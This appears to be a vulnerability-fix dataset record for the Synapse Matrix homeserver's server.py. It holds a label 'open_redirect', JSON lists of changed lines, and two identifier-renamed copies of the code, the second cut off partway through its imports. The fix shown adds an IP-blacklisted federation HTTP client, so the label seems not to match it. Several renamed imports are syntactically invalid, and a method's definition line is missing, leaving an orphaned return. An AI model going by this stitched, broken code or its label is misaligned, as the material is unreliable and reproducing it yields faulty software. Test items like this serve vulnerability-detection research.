# unless handlers are instantiated.
if self.config.run_background_tasks:
self.setup_background_tasks()
def setup_background_tasks(self) -> None:
"""
Some handlers have side effects on instantiation (like registering
background updates). This function causes them to be fetched, and
therefore instantiated, to run those side effects.
"""
for i in self.REQUIRED_ON_BACKGROUND_TASK_STARTUP:
getattr(self, "get_" + i + "_handler")()
def get_reactor(self) -> twisted.internet.base.ReactorBase:
"""
Fetch the Twisted reactor in use by this HomeServer.
"""
return self._reactor
def get_ip_from_request(self, request) -> str:
# X-Forwarded-For is handled by our custom request type.
return request.getClientIP()
def is_mine(self, domain_specific_string: DomainSpecificString) -> bool:
return domain_specific_string.domain == self.hostname
def is_mine_id(self, string: str) -> bool:
return string.split(":", 1)[1] == self.hostname
@cache_in_self
def get_clock(self) -> Clock:
return Clock(self._reactor)
def get_datastore(self) -> DataStore:
if not self.datastores:
raise Exception("HomeServer.setup must be called before getting datastores")
return self.datastores.main
def get_datastores(self) -> Databases:
if not self.datastores:
raise Exception("HomeServer.setup must be called before getting datastores")
return self.datastores
def get_config(self) -> HomeServerConfig:
return self.config
@cache_in_self
def get_distributor(self) -> Distributor:
return Distributor()
@cache_in_self
def get_registration_ratelimiter(self) -> Ratelimiter:
return Ratelimiter(
clock=self.get_clock(),
rate_hz=self.config.rc_registration.per_second,
burst_count=self.config.rc_registration.burst_count,
)
@cache_in_self
def get_federation_client(self) -> FederationClient:
return FederationClient(self)
@cache_in_self
def get_federation_server(self) -> FederationServer:
return FederationServer(self)
@cache_in_self
def get_notifier(self) -> Notifier:
return Notifier(self)
@cache_in_self
def get_auth(self) -> Auth:
return Auth(self)
@cache_in_self
def get_http_client_context_factory(self) -> IPolicyForHTTPS:
return (
InsecureInterceptableContextFactory()
if self.config.use_insecure_ssl_client_just_for_testing_do_not_use
else RegularPolicyForHTTPS()
)
@cache_in_self
def get_simple_http_client(self) -> SimpleHttpClient:
"""
An HTTP client with no special configuration.
"""
return SimpleHttpClient(self)
@cache_in_self
def get_proxied_http_client(self) -> SimpleHttpClient:
"""
An HTTP client that uses configured HTTP(S) proxies.
"""
return SimpleHttpClient(
self,
http_proxy=os.getenvb(b"http_proxy"),
https_proxy=os.getenvb(b"HTTPS_PROXY"),
)
@cache_in_self
def get_proxied_blacklisted_http_client(self) -> SimpleHttpClient:
"""
An HTTP client that uses configured HTTP(S) proxies and blacklists IPs
based on the IP range blacklist.
"""
return SimpleHttpClient(
self,
ip_blacklist=self.config.ip_range_blacklist,
http_proxy=os.getenvb(b"http_proxy"),
https_proxy=os.getenvb(b"HTTPS_PROXY"),
)
@cache_in_self
def get_federation_http_client(self) -> MatrixFederationHttpClient:
"""
An HTTP client for federation.
"""
tls_client_options_factory = context_factory.FederationPolicyForHTTPS(
self.config
)
return MatrixFederationHttpClient(self, tls_client_options_factory)
@cache_in_self
def get_room_creation_handler(self) -> RoomCreationHandler:
return RoomCreationHandler(self)
@cache_in_self
def get_room_shutdown_handler(self) -> RoomShutdownHandler:
return RoomShutdownHandler(self)
@cache_in_self
def get_sendmail(self) -> sendmail:
return sendmail
@cache_in_self
def get_state_handler(self) -> StateHandler:
return StateHandler(self)
@cache_in_self
def get_state_resolution_handler(self) -> StateResolutionHandler:
return StateResolutionHandler(self)
@cache_in_self
def get_presence_handler(self) -> PresenceHandler:
return PresenceHandler(self)
@cache_in_self
def get_typing_handler(self):
if self.config.worker.writers.typing == self.get_instance_name():
return TypingWriterHandler(self)
else:
return FollowerTypingHandler(self)
@cache_in_self
def get_sso_handler(self) -> SsoHandler:
return SsoHandler(self)
@cache_in_self
def get_sync_handler(self) -> SyncHandler:
return SyncHandler(self)
@cache_in_self
def get_room_list_handler(self) -> RoomListHandler:
return RoomListHandler(self)
@cache_in_self
def get_auth_handler(self) -> AuthHandler:
return AuthHandler(self)
@cache_in_self
def get_macaroon_generator(self) -> MacaroonGenerator:
return MacaroonGenerator(self)
@cache_in_self
def get_device_handler(self):
if self.config.worker_app:
return DeviceWorkerHandler(self)
else:
return DeviceHandler(self)
@cache_in_self
def get_device_message_handler(self) -> DeviceMessageHandler:
return DeviceMessageHandler(self)
@cache_in_self
def get_directory_handler(self) -> DirectoryHandler:
return DirectoryHandler(self)
@cache_in_self
def get_e2e_keys_handler(self) -> E2eKeysHandler:
return E2eKeysHandler(self)
@cache_in_self
def get_e2e_room_keys_handler(self) -> E2eRoomKeysHandler:
return E2eRoomKeysHandler(self)
@cache_in_self
def get_acme_handler(self) -> AcmeHandler:
return AcmeHandler(self)
@cache_in_self
def get_admin_handler(self) -> AdminHandler:
return AdminHandler(self)
@cache_in_self
def get_application_service_api(self) -> ApplicationServiceApi:
return ApplicationServiceApi(self)
@cache_in_self
def get_application_service_scheduler(self) -> ApplicationServiceScheduler:
return ApplicationServiceScheduler(self)
@cache_in_self
def get_application_service_handler(self) -> ApplicationServicesHandler:
return ApplicationServicesHandler(self)
@cache_in_self
def get_event_handler(self) -> EventHandler:
return EventHandler(self)
@cache_in_self
def get_event_stream_handler(self) -> EventStreamHandler:
return EventStreamHandler(self)
@cache_in_self
def get_federation_handler(self) -> FederationHandler:
return FederationHandler(self)
@cache_in_self
def get_identity_handler(self) -> IdentityHandler:
return IdentityHandler(self)
@cache_in_self
def get_initial_sync_handler(self) -> InitialSyncHandler:
return InitialSyncHandler(self)
@cache_in_self
def get_profile_handler(self):
return ProfileHandler(self)
@cache_in_self
def get_event_creation_handler(self) -> EventCreationHandler:
return EventCreationHandler(self)
@cache_in_self
def get_deactivate_account_handler(self) -> DeactivateAccountHandler:
return DeactivateAccountHandler(self)
@cache_in_self
def get_search_handler(self) -> SearchHandler:
return SearchHandler(self)
@cache_in_self
def get_set_password_handler(self) -> SetPasswordHandler:
return SetPasswordHandler(self)
@cache_in_self
def get_event_sources(self) -> EventSources:
return EventSources(self)
@cache_in_self
def get_keyring(self) -> Keyring:
return Keyring(self)
@cache_in_self
def get_event_builder_factory(self) -> EventBuilderFactory:
return EventBuilderFactory(self)
@cache_in_self
def get_filtering(self) -> Filtering:
return Filtering(self)
@cache_in_self
def get_pusherpool(self) -> PusherPool:
return PusherPool(self)
@cache_in_self
def get_media_repository_resource(self) -> MediaRepositoryResource:
# build the media repo resource. This indirects through the HomeServer
# to ensure that we only have a single instance of
return MediaRepositoryResource(self)
@cache_in_self
def get_media_repository(self) -> MediaRepository:
return MediaRepository(self)
@cache_in_self
def get_federation_transport_client(self) -> TransportLayerClient:
return TransportLayerClient(self)
@cache_in_self
def get_federation_sender(self):
if self.should_send_federation():
return FederationSender(self)
elif not self.config.worker_app:
return FederationRemoteSendQueue(self)
else:
raise Exception("Workers cannot send federation traffic")
@cache_in_self
def get_receipts_handler(self) -> ReceiptsHandler:
return ReceiptsHandler(self)
@cache_in_self
def get_read_marker_handler(self) -> ReadMarkerHandler:
return ReadMarkerHandler(self)
@cache_in_self
def get_tcp_replication(self) -> ReplicationCommandHandler:
return ReplicationCommandHandler(self)
@cache_in_self
def get_action_generator(self) -> ActionGenerator:
return ActionGenerator(self)
@cache_in_self
def get_user_directory_handler(self) -> UserDirectoryHandler:
return UserDirectoryHandler(self)
@cache_in_self
def get_groups_local_handler(self):
if self.config.worker_app:
return GroupsLocalWorkerHandler(self)
else:
return GroupsLocalHandler(self)
@cache_in_self
def get_groups_server_handler(self):
if self.config.worker_app:
return GroupsServerWorkerHandler(self)
else:
return GroupsServerHandler(self)
@cache_in_self
def get_groups_attestation_signing(self) -> GroupAttestationSigning:
return GroupAttestationSigning(self)
@cache_in_self
def get_groups_attestation_renewer(self) -> GroupAttestionRenewer:
return GroupAttestionRenewer(self)
@cache_in_self
def get_secrets(self) -> Secrets:
return Secrets()
@cache_in_self
def get_stats_handler(self) -> StatsHandler:
return StatsHandler(self)
@cache_in_self
def get_spam_checker(self):
return SpamChecker(self)
@cache_in_self
def get_third_party_event_rules(self) -> ThirdPartyEventRules:
return ThirdPartyEventRules(self)
@cache_in_self
def get_room_member_handler(self):
if self.config.worker_app:
return RoomMemberWorkerHandler(self)
return RoomMemberMasterHandler(self)
@cache_in_self
def get_federation_registry(self) -> FederationHandlerRegistry:
return FederationHandlerRegistry(self)
@cache_in_self
def get_server_notices_manager(self):
if self.config.worker_app:
raise Exception("Workers cannot send server notices")
return ServerNoticesManager(self)
@cache_in_self
def get_server_notices_sender(self):
if self.config.worker_app:
return WorkerServerNoticesSender(self)
return ServerNoticesSender(self)
@cache_in_self
def get_message_handler(self) -> MessageHandler:
return MessageHandler(self)
@cache_in_self
def get_pagination_handler(self) -> PaginationHandler:
return PaginationHandler(self)
@cache_in_self
def get_room_context_handler(self) -> RoomContextHandler:
return RoomContextHandler(self)
@cache_in_self
def get_registration_handler(self) -> RegistrationHandler:
return RegistrationHandler(self)
@cache_in_self
def get_account_validity_handler(self) -> AccountValidityHandler:
return AccountValidityHandler(self)
@cache_in_self
def get_cas_handler(self) -> CasHandler:
return CasHandler(self)
@cache_in_self
def get_saml_handler(self) -> "SamlHandler":
from synapse.handlers.saml_handler import SamlHandler
return SamlHandler(self)
@cache_in_self
def get_oidc_handler(self) -> "OidcHandler":
from synapse.handlers.oidc_handler import OidcHandler
return OidcHandler(self)
@cache_in_self
def get_event_client_serializer(self) -> EventClientSerializer:
return EventClientSerializer(self)
@cache_in_self
def get_password_policy_handler(self) -> PasswordPolicyHandler:
return PasswordPolicyHandler(self)
@cache_in_self
def get_storage(self) -> Storage:
return Storage(self, self.get_datastores())
@cache_in_self
def get_replication_streamer(self) -> ReplicationStreamer:
return ReplicationStreamer(self)
@cache_in_self
def get_replication_data_handler(self) -> ReplicationDataHandler:
return ReplicationDataHandler(self)
@cache_in_self
def get_replication_streams(self) -> Dict[str, Stream]:
return {stream.NAME: stream(self) for stream in STREAMS_MAP.values()}
@cache_in_self
def get_federation_ratelimiter(self) -> FederationRateLimiter:
return FederationRateLimiter(self.get_clock(), config=self.config.rc_federation)
@cache_in_self
def get_module_api(self) -> ModuleApi:
return ModuleApi(self, self.get_auth_handler())
async def remove_pusher(self, app_id: str, push_key: str, user_id: str):
return await self.get_pusherpool().remove_pusher(app_id, push_key, user_id)
def should_send_federation(self) -> bool:
"Should this server be sending federation traffic directly?"
return self.config.send_federation and (
not self.config.worker_app
or self.config.worker_app == "synapse.app.federation_sender"
)
| open_redirect | {
"code": [
" @cache_in_self",
" def get_http_client(self) -> MatrixFederationHttpClient:",
" tls_client_options_factory = context_factory.FederationPolicyForHTTPS(",
" self.config",
" )",
" return MatrixFederationHttpClient(self, tls_client_options_factory)"
],
"line_no": [
517,
518,
519,
520,
521,
522
]
} | {
"code": [
" \"\"\"",
" \"\"\"",
" \"\"\"",
" An HTTP client that uses configured HTTP(S) proxies.",
" return SimpleHttpClient(",
" self,",
" http_proxy=os.getenvb(b\"http_proxy\"),",
" )",
" @cache_in_self",
" \"\"\"",
" An HTTP client that uses configured HTTP(S) proxies and blacklists IPs",
" based on the IP range blacklist.",
" ip_blacklist=self.config.ip_range_blacklist,",
" def get_federation_http_client(self) -> MatrixFederationHttpClient:",
" \"\"\"",
" An HTTP client for federation.",
" tls_client_options_factory = context_factory.FederationPolicyForHTTPS(",
" self.config",
" )",
" return MatrixFederationHttpClient(self, tls_client_options_factory)"
],
"line_no": [
353,
355,
360,
361,
363,
364,
365,
367,
369,
371,
372,
373,
377,
383,
384,
385,
387,
388,
389,
390
]
} |
import abc
import functools
import logging
import os
from typing import .TYPE_CHECKING, Any, Callable, Dict, List, Optional, TypeVar, cast
import twisted.internet.base
import twisted.internet.tcp
from twisted.mail.smtp import sendmail
from twisted.web.iweb import IPolicyForHTTPS
from synapse.api.auth import Auth
from synapse.api.filtering import Filtering
from synapse.api.ratelimiting import Ratelimiter
from synapse.appservice.api import ApplicationServiceApi
from synapse.appservice.scheduler import ApplicationServiceScheduler
from synapse.config.homeserver import .HomeServerConfig
from synapse.crypto import context_factory
from synapse.crypto.context_factory import RegularPolicyForHTTPS
from synapse.crypto.keyring import Keyring
from synapse.events.builder import EventBuilderFactory
from synapse.events.spamcheck import SpamChecker
from synapse.events.third_party_rules import .ThirdPartyEventRules
from synapse.events.utils import EventClientSerializer
from synapse.federation.federation_client import FederationClient
from synapse.federation.federation_server import (
FederationHandlerRegistry,
FederationServer,
)
from synapse.federation.send_queue import FederationRemoteSendQueue
from synapse.federation.sender import FederationSender
from synapse.federation.transport.client import .TransportLayerClient
from synapse.groups.attestations import GroupAttestationSigning, GroupAttestionRenewer
from synapse.groups.groups_server import GroupsServerHandler, GroupsServerWorkerHandler
from synapse.handlers.account_validity import AccountValidityHandler
from synapse.handlers.acme import AcmeHandler
from synapse.handlers.admin import AdminHandler
from synapse.handlers.appservice import ApplicationServicesHandler
from synapse.handlers.auth import AuthHandler, MacaroonGenerator
from synapse.handlers.cas_handler import CasHandler
from synapse.handlers.deactivate_account import DeactivateAccountHandler
from synapse.handlers.device import DeviceHandler, DeviceWorkerHandler
from synapse.handlers.devicemessage import DeviceMessageHandler
from synapse.handlers.directory import DirectoryHandler
from synapse.handlers.e2e_keys import E2eKeysHandler
from synapse.handlers.e2e_room_keys import E2eRoomKeysHandler
from synapse.handlers.events import EventHandler, EventStreamHandler
from synapse.handlers.federation import FederationHandler
from synapse.handlers.groups_local import GroupsLocalHandler, GroupsLocalWorkerHandler
from synapse.handlers.identity import IdentityHandler
from synapse.handlers.initial_sync import InitialSyncHandler
from synapse.handlers.message import EventCreationHandler, MessageHandler
from synapse.handlers.pagination import PaginationHandler
from synapse.handlers.password_policy import PasswordPolicyHandler
from synapse.handlers.presence import PresenceHandler
from synapse.handlers.profile import ProfileHandler
from synapse.handlers.read_marker import ReadMarkerHandler
from synapse.handlers.receipts import ReceiptsHandler
from synapse.handlers.register import RegistrationHandler
from synapse.handlers.room import (
RoomContextHandler,
RoomCreationHandler,
RoomShutdownHandler,
)
from synapse.handlers.room_list import RoomListHandler
from synapse.handlers.room_member import RoomMemberMasterHandler
from synapse.handlers.room_member_worker import RoomMemberWorkerHandler
from synapse.handlers.search import SearchHandler
from synapse.handlers.set_password import SetPasswordHandler
from synapse.handlers.sso import SsoHandler
from synapse.handlers.stats import StatsHandler
from synapse.handlers.sync import SyncHandler
from synapse.handlers.typing import FollowerTypingHandler, TypingWriterHandler
from synapse.handlers.user_directory import UserDirectoryHandler
from synapse.http.client import InsecureInterceptableContextFactory, SimpleHttpClient
from synapse.http.matrixfederationclient import MatrixFederationHttpClient
from synapse.module_api import ModuleApi
from synapse.notifier import Notifier
from synapse.push.action_generator import ActionGenerator
from synapse.push.pusherpool import PusherPool
from synapse.replication.tcp.client import ReplicationDataHandler
from synapse.replication.tcp.handler import ReplicationCommandHandler
from synapse.replication.tcp.resource import ReplicationStreamer
from synapse.replication.tcp.streams import STREAMS_MAP, Stream
from synapse.rest.media.v1.media_repository import (
MediaRepository,
MediaRepositoryResource,
)
from synapse.secrets import Secrets
from synapse.server_notices.server_notices_manager import ServerNoticesManager
from synapse.server_notices.server_notices_sender import ServerNoticesSender
from synapse.server_notices.worker_server_notices_sender import (
WorkerServerNoticesSender,
)
from synapse.state import StateHandler, StateResolutionHandler
from synapse.storage import Databases, DataStore, Storage
from synapse.streams.events import EventSources
from synapse.types import DomainSpecificString
from synapse.util import Clock
from synapse.util.distributor import Distributor
from synapse.util.ratelimitutils import FederationRateLimiter
from synapse.util.stringutils import random_string
VAR_0 = logging.getLogger(__name__)
if TYPE_CHECKING:
from synapse.handlers.oidc_handler import OidcHandler
from synapse.handlers.saml_handler import SamlHandler
VAR_1 = TypeVar("T", bound=Callable[..., Any])
def FUNC_0(VAR_2: VAR_1) -> T:
if not VAR_2.__name__.startswith("get_"):
raise Exception(
"@FUNC_0 can only be used on functions starting with `get_`"
)
VAR_3 = VAR_2.__name__[len("get") :]
VAR_4 = [False]
@functools.wraps(VAR_2)
def FUNC_1(self):
try:
return getattr(self, VAR_3)
except AttributeError:
pass
if VAR_4[0]:
raise ValueError("Cyclic dependency while VAR_4 %s" % (VAR_3,))
VAR_4[0] = True
try:
VAR_18 = VAR_2(self)
setattr(self, VAR_3, VAR_18)
finally:
VAR_4[0] = False
return VAR_18
return cast(VAR_1, FUNC_1)
class CLASS_0(metaclass=abc.ABCMeta):
VAR_5 = [
"account_validity",
"auth",
"deactivate_account",
"message",
"pagination",
"profile",
"stats",
]
VAR_6 = abc.abstractproperty()
def __init__(
self,
VAR_7: str,
VAR_8: HomeServerConfig,
VAR_9=None,
VAR_10="Synapse",
):
if not VAR_9:
from twisted.internet import .reactor as _reactor
VAR_9 = _reactor
self._reactor = VAR_9
self.hostname = VAR_7
self.signing_key = VAR_8.key.signing_key[0]
self.config = VAR_8
self._listening_services = [] # type: List[twisted.internet.tcp.Port]
self.start_time = None # type: Optional[int]
self._instance_id = random_string(5)
self._instance_name = VAR_8.worker_name or "master"
self.version_string = VAR_10
self.datastores = None # type: Optional[Databases]
def FUNC_2(self) -> str:
return self._instance_id
def FUNC_3(self) -> str:
return self._instance_name
def FUNC_4(self) -> None:
VAR_0.info("Setting up.")
self.start_time = int(self.get_clock().time())
self.datastores = Databases(self.DATASTORE_CLASS, self)
VAR_0.info("Finished setting up.")
if self.config.run_background_tasks:
self.setup_background_tasks()
def FUNC_5(self) -> None:
for i in self.REQUIRED_ON_BACKGROUND_TASK_STARTUP:
getattr(self, "get_" + i + "_handler")()
def FUNC_6(self) -> twisted.internet.base.ReactorBase:
return self._reactor
def FUNC_7(self, VAR_11) -> str:
return VAR_11.getClientIP()
def FUNC_8(self, VAR_12: DomainSpecificString) -> bool:
return VAR_12.domain == self.hostname
def FUNC_9(self, VAR_13: str) -> bool:
return VAR_13.split(":", 1)[1] == self.hostname
@FUNC_0
def FUNC_10(self) -> Clock:
return Clock(self._reactor)
def FUNC_11(self) -> DataStore:
if not self.datastores:
raise Exception("HomeServer.setup must be called before getting datastores")
return self.datastores.main
def FUNC_12(self) -> Databases:
if not self.datastores:
raise Exception("HomeServer.setup must be called before getting datastores")
return self.datastores
def FUNC_13(self) -> HomeServerConfig:
return self.config
@FUNC_0
def FUNC_14(self) -> Distributor:
return Distributor()
@FUNC_0
def FUNC_15(self) -> Ratelimiter:
return Ratelimiter(
clock=self.get_clock(),
rate_hz=self.config.rc_registration.per_second,
burst_count=self.config.rc_registration.burst_count,
)
@FUNC_0
def FUNC_16(self) -> FederationClient:
return FederationClient(self)
@FUNC_0
def FUNC_17(self) -> FederationServer:
return FederationServer(self)
@FUNC_0
def FUNC_18(self) -> Notifier:
return Notifier(self)
@FUNC_0
def FUNC_19(self) -> Auth:
return Auth(self)
@FUNC_0
def FUNC_20(self) -> IPolicyForHTTPS:
return (
InsecureInterceptableContextFactory()
if self.config.use_insecure_ssl_client_just_for_testing_do_not_use
else RegularPolicyForHTTPS()
)
@FUNC_0
def FUNC_21(self) -> SimpleHttpClient:
return SimpleHttpClient(self)
@FUNC_0
def FUNC_22(self) -> SimpleHttpClient:
return SimpleHttpClient(
self,
http_proxy=os.getenvb(b"http_proxy"),
https_proxy=os.getenvb(b"HTTPS_PROXY"),
)
@FUNC_0
def FUNC_23(self) -> RoomCreationHandler:
return RoomCreationHandler(self)
@FUNC_0
def FUNC_24(self) -> RoomShutdownHandler:
return RoomShutdownHandler(self)
@FUNC_0
def FUNC_25(self) -> sendmail:
return sendmail
@FUNC_0
def FUNC_26(self) -> StateHandler:
return StateHandler(self)
@FUNC_0
def FUNC_27(self) -> StateResolutionHandler:
return StateResolutionHandler(self)
@FUNC_0
def FUNC_28(self) -> PresenceHandler:
return PresenceHandler(self)
@FUNC_0
def FUNC_29(self):
if self.config.worker.writers.typing == self.get_instance_name():
return TypingWriterHandler(self)
else:
return FollowerTypingHandler(self)
@FUNC_0
def FUNC_30(self) -> SsoHandler:
return SsoHandler(self)
@FUNC_0
def FUNC_31(self) -> SyncHandler:
return SyncHandler(self)
@FUNC_0
def FUNC_32(self) -> RoomListHandler:
return RoomListHandler(self)
@FUNC_0
def FUNC_33(self) -> AuthHandler:
return AuthHandler(self)
@FUNC_0
def FUNC_34(self) -> MacaroonGenerator:
return MacaroonGenerator(self)
@FUNC_0
def FUNC_35(self):
if self.config.worker_app:
return DeviceWorkerHandler(self)
else:
return DeviceHandler(self)
@FUNC_0
def FUNC_36(self) -> DeviceMessageHandler:
return DeviceMessageHandler(self)
@FUNC_0
def FUNC_37(self) -> DirectoryHandler:
return DirectoryHandler(self)
@FUNC_0
def FUNC_38(self) -> E2eKeysHandler:
return E2eKeysHandler(self)
@FUNC_0
def FUNC_39(self) -> E2eRoomKeysHandler:
return E2eRoomKeysHandler(self)
@FUNC_0
def FUNC_40(self) -> AcmeHandler:
return AcmeHandler(self)
@FUNC_0
def FUNC_41(self) -> AdminHandler:
return AdminHandler(self)
@FUNC_0
def FUNC_42(self) -> ApplicationServiceApi:
return ApplicationServiceApi(self)
@FUNC_0
def FUNC_43(self) -> ApplicationServiceScheduler:
return ApplicationServiceScheduler(self)
@FUNC_0
def FUNC_44(self) -> ApplicationServicesHandler:
return ApplicationServicesHandler(self)
@FUNC_0
def FUNC_45(self) -> EventHandler:
return EventHandler(self)
@FUNC_0
def FUNC_46(self) -> EventStreamHandler:
return EventStreamHandler(self)
@FUNC_0
def FUNC_47(self) -> FederationHandler:
return FederationHandler(self)
@FUNC_0
def FUNC_48(self) -> IdentityHandler:
return IdentityHandler(self)
@FUNC_0
def FUNC_49(self) -> InitialSyncHandler:
return InitialSyncHandler(self)
@FUNC_0
def FUNC_50(self):
return ProfileHandler(self)
@FUNC_0
def FUNC_51(self) -> EventCreationHandler:
return EventCreationHandler(self)
@FUNC_0
def FUNC_52(self) -> DeactivateAccountHandler:
return DeactivateAccountHandler(self)
@FUNC_0
def FUNC_53(self) -> SearchHandler:
return SearchHandler(self)
@FUNC_0
def FUNC_54(self) -> SetPasswordHandler:
return SetPasswordHandler(self)
@FUNC_0
def FUNC_55(self) -> EventSources:
return EventSources(self)
@FUNC_0
def FUNC_56(self) -> Keyring:
return Keyring(self)
@FUNC_0
def FUNC_57(self) -> EventBuilderFactory:
return EventBuilderFactory(self)
@FUNC_0
def FUNC_58(self) -> Filtering:
return Filtering(self)
@FUNC_0
def FUNC_59(self) -> PusherPool:
return PusherPool(self)
@FUNC_0
def FUNC_60(self) -> MatrixFederationHttpClient:
VAR_17 = context_factory.FederationPolicyForHTTPS(
self.config
)
return MatrixFederationHttpClient(self, VAR_17)
@FUNC_0
def FUNC_61(self) -> MediaRepositoryResource:
return MediaRepositoryResource(self)
@FUNC_0
def FUNC_62(self) -> MediaRepository:
return MediaRepository(self)
@FUNC_0
def FUNC_63(self) -> TransportLayerClient:
return TransportLayerClient(self)
@FUNC_0
def FUNC_64(self):
if self.should_send_federation():
return FederationSender(self)
elif not self.config.worker_app:
return FederationRemoteSendQueue(self)
else:
raise Exception("Workers cannot send federation traffic")
@FUNC_0
def FUNC_65(self) -> ReceiptsHandler:
return ReceiptsHandler(self)
@FUNC_0
def FUNC_66(self) -> ReadMarkerHandler:
return ReadMarkerHandler(self)
@FUNC_0
def FUNC_67(self) -> ReplicationCommandHandler:
return ReplicationCommandHandler(self)
@FUNC_0
def FUNC_68(self) -> ActionGenerator:
return ActionGenerator(self)
@FUNC_0
def FUNC_69(self) -> UserDirectoryHandler:
return UserDirectoryHandler(self)
@FUNC_0
def FUNC_70(self):
if self.config.worker_app:
return GroupsLocalWorkerHandler(self)
else:
return GroupsLocalHandler(self)
@FUNC_0
def FUNC_71(self):
if self.config.worker_app:
return GroupsServerWorkerHandler(self)
else:
return GroupsServerHandler(self)
@FUNC_0
def FUNC_72(self) -> GroupAttestationSigning:
return GroupAttestationSigning(self)
@FUNC_0
def FUNC_73(self) -> GroupAttestionRenewer:
return GroupAttestionRenewer(self)
@FUNC_0
def FUNC_74(self) -> Secrets:
return Secrets()
@FUNC_0
def FUNC_75(self) -> StatsHandler:
return StatsHandler(self)
@FUNC_0
def FUNC_76(self):
return SpamChecker(self)
@FUNC_0
def FUNC_77(self) -> ThirdPartyEventRules:
return ThirdPartyEventRules(self)
@FUNC_0
def FUNC_78(self):
if self.config.worker_app:
return RoomMemberWorkerHandler(self)
return RoomMemberMasterHandler(self)
@FUNC_0
def FUNC_79(self) -> FederationHandlerRegistry:
return FederationHandlerRegistry(self)
@FUNC_0
def FUNC_80(self):
if self.config.worker_app:
raise Exception("Workers cannot send server notices")
return ServerNoticesManager(self)
@FUNC_0
def FUNC_81(self):
if self.config.worker_app:
return WorkerServerNoticesSender(self)
return ServerNoticesSender(self)
@FUNC_0
def FUNC_82(self) -> MessageHandler:
return MessageHandler(self)
@FUNC_0
def FUNC_83(self) -> PaginationHandler:
return PaginationHandler(self)
@FUNC_0
def FUNC_84(self) -> RoomContextHandler:
return RoomContextHandler(self)
@FUNC_0
def FUNC_85(self) -> RegistrationHandler:
return RegistrationHandler(self)
@FUNC_0
def FUNC_86(self) -> AccountValidityHandler:
return AccountValidityHandler(self)
@FUNC_0
def FUNC_87(self) -> CasHandler:
return CasHandler(self)
@FUNC_0
def FUNC_88(self) -> "SamlHandler":
from synapse.handlers.saml_handler import SamlHandler
return SamlHandler(self)
@FUNC_0
def FUNC_89(self) -> "OidcHandler":
from synapse.handlers.oidc_handler import OidcHandler
return OidcHandler(self)
@FUNC_0
def FUNC_90(self) -> EventClientSerializer:
return EventClientSerializer(self)
@FUNC_0
def FUNC_91(self) -> PasswordPolicyHandler:
return PasswordPolicyHandler(self)
@FUNC_0
def FUNC_92(self) -> Storage:
return Storage(self, self.get_datastores())
@FUNC_0
def FUNC_93(self) -> ReplicationStreamer:
return ReplicationStreamer(self)
@FUNC_0
def FUNC_94(self) -> ReplicationDataHandler:
return ReplicationDataHandler(self)
@FUNC_0
def FUNC_95(self) -> Dict[str, Stream]:
return {stream.NAME: stream(self) for stream in STREAMS_MAP.values()}
@FUNC_0
def FUNC_96(self) -> FederationRateLimiter:
return FederationRateLimiter(self.get_clock(), VAR_8=self.config.rc_federation)
@FUNC_0
def FUNC_97(self) -> ModuleApi:
return ModuleApi(self, self.get_auth_handler())
async def FUNC_98(self, VAR_14: str, VAR_15: str, VAR_16: str):
return await self.get_pusherpool().remove_pusher(VAR_14, VAR_15, VAR_16)
return self.config.send_federation and (
not self.config.worker_app
or self.config.worker_app == "synapse.app.federation_sender"
)
|
import abc
import functools
import logging
import os
from typing import .TYPE_CHECKING, Any, Callable, Dict, List, Optional, TypeVar, cast
import twisted.internet.base
import twisted.internet.tcp
from twisted.mail.smtp import sendmail
from twisted.web.iweb import IPolicyForHTTPS
from synapse.api.auth import Auth
from synapse.api.filtering import Filtering
from synapse.api.ratelimiting import Ratelimiter
from synapse.appservice.api import ApplicationServiceApi
from synapse.appservice.scheduler import ApplicationServiceScheduler
from synapse.config.homeserver import .HomeServerConfig
from synapse.crypto import context_factory
from synapse.crypto.context_factory import RegularPolicyForHTTPS
from synapse.crypto.keyring import Keyring
from synapse.events.builder import EventBuilderFactory
from synapse.events.spamcheck import SpamChecker
from synapse.events.third_party_rules import .ThirdPartyEventRules
from synapse.events.utils import EventClientSerializer
from synapse.federation.federation_client import FederationClient
from synapse.federation.federation_server import (
FederationHandlerRegistry,
FederationServer,
)
from synapse.federation.send_queue import FederationRemoteSendQueue
from synapse.federation.sender import FederationSender
from synapse.federation.transport.client import .TransportLayerClient
from synapse.groups.attestations import GroupAttestationSigning, GroupAttestionRenewer
from synapse.groups.groups_server import GroupsServerHandler, GroupsServerWorkerHandler
from synapse.handlers.account_validity import AccountValidityHandler
from synapse.handlers.acme import AcmeHandler
from synapse.handlers.admin import AdminHandler
from synapse.handlers.appservice import ApplicationServicesHandler
from synapse.handlers.auth import AuthHandler, MacaroonGenerator
from synapse.handlers.cas_handler import CasHandler
from synapse.handlers.deactivate_account import DeactivateAccountHandler
from synapse.handlers.device import DeviceHandler, DeviceWorkerHandler
from synapse.handlers.devicemessage import DeviceMessageHandler
from synapse.handlers.directory import DirectoryHandler
from synapse.handlers.e2e_keys import E2eKeysHandler
from synapse.handlers.e2e_room_keys import E2eRoomKeysHandler
from synapse.handlers.events import EventHandler, EventStreamHandler
from synapse.handlers.federation import FederationHandler
from synapse.handlers.groups_local import GroupsLocalHandler, GroupsLocalWorkerHandler
from synapse.handlers.identity import IdentityHandler
from synapse.handlers.initial_sync import InitialSyncHandler
from synapse.handlers.message import EventCreationHandler, MessageHandler
from synapse.handlers.pagination import PaginationHandler
from synapse.handlers.password_policy import PasswordPolicyHandler
from synapse.handlers.presence import PresenceHandler
from synapse.handlers.profile import ProfileHandler
from synapse.handlers.read_marker import ReadMarkerHandler
from synapse.handlers.receipts import ReceiptsHandler
from synapse.handlers.register import RegistrationHandler
from synapse.handlers.room import (
RoomContextHandler,
RoomCreationHandler,
RoomShutdownHandler,
)
from synapse.handlers.room_list import RoomListHandler
from synapse.handlers.room_member import RoomMemberMasterHandler
from synapse.handlers.room_member_worker import RoomMemberWorkerHandler
from synapse.handlers.search import SearchHandler
from synapse.handlers.set_password import SetPasswordHandler
from synapse.handlers.sso import SsoHandler
from synapse.handlers.stats import StatsHandler
from synapse.handlers.sync import SyncHandler
from synapse.handlers.typing import FollowerTypingHandler, TypingWriterHandler
from synapse.handlers.user_directory import UserDirectoryHandler
from synapse.http.client import InsecureInterceptableContextFactory, SimpleHttpClient
from synapse.http.matrixfederationclient import MatrixFederationHttpClient
from synapse.module_api import ModuleApi
from synapse.notifier import Notifier
from synapse.push.action_generator import ActionGenerator
from synapse.push.pusherpool import PusherPool
from synapse.replication.tcp.client import ReplicationDataHandler
from synapse.replication.tcp.handler import ReplicationCommandHandler
from synapse.replication.tcp.resource import ReplicationStreamer
from synapse.replication.tcp.streams import STREAMS_MAP, Stream
from synapse.rest.media.v1.media_repository import (
MediaRepository,
